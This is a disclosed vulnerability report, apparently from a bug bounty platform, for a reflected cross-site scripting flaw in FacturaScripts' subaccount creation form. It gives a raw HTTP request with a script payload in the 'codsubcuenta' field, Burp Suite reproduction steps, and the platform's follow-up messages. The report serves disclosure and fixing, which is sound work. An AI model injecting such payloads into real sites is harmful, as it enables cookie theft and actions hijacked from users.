Cross-site scripting - Reflected in Create Subaccount in neorazorx/facturascripts
Valid
Reported on
Apr 30th 2022
Description
Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.
Proof of Concept
POST /facturascripts/EditSubcuenta HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
Content-Length: 1558
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditSubcuenta
Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US;
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="action"
insert
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="activetab"
EditSubcuenta
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="code"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="multireqtoken"
99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codsubcuenta"
<script>alert(1337)</script>
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="descripcion"
123123
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codejercicio"
2022
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="idcuenta"
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="codcuentaesp"
CLIENT
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="debe"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="haber"
0
-----------------------------363416527826407339693188325960
Content-Disposition: form-data; name="saldo"
0
-----------------------------363416527826407339693188325960--
Step to reproduce
- In
Accountingsection, chooseNewand fill all form with anything value

- Use
Burp suiteintercept this request and modifycodsubcuentaparameter value withXSS payloadand clickForward

- And
alert(1337)execute

Impact
This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...
We are processing your report and will contact the
neorazorx/facturascripts
team within 24 hours.
a year ago
We have contacted a member of the
neorazorx/facturascripts
team and are waiting to hear back
a year ago
@nhienit2010 - our system will reach out to the maintainer automatically and notify them of your report. The maintainer is extremely active on the platform, so I am sure you will hear back shortly ♥️
The researcher's credibility has increased: +7
Hi @maintainer, the fix is already released, can you assign a CVE here? if you can, hope @admin help
to join this conversation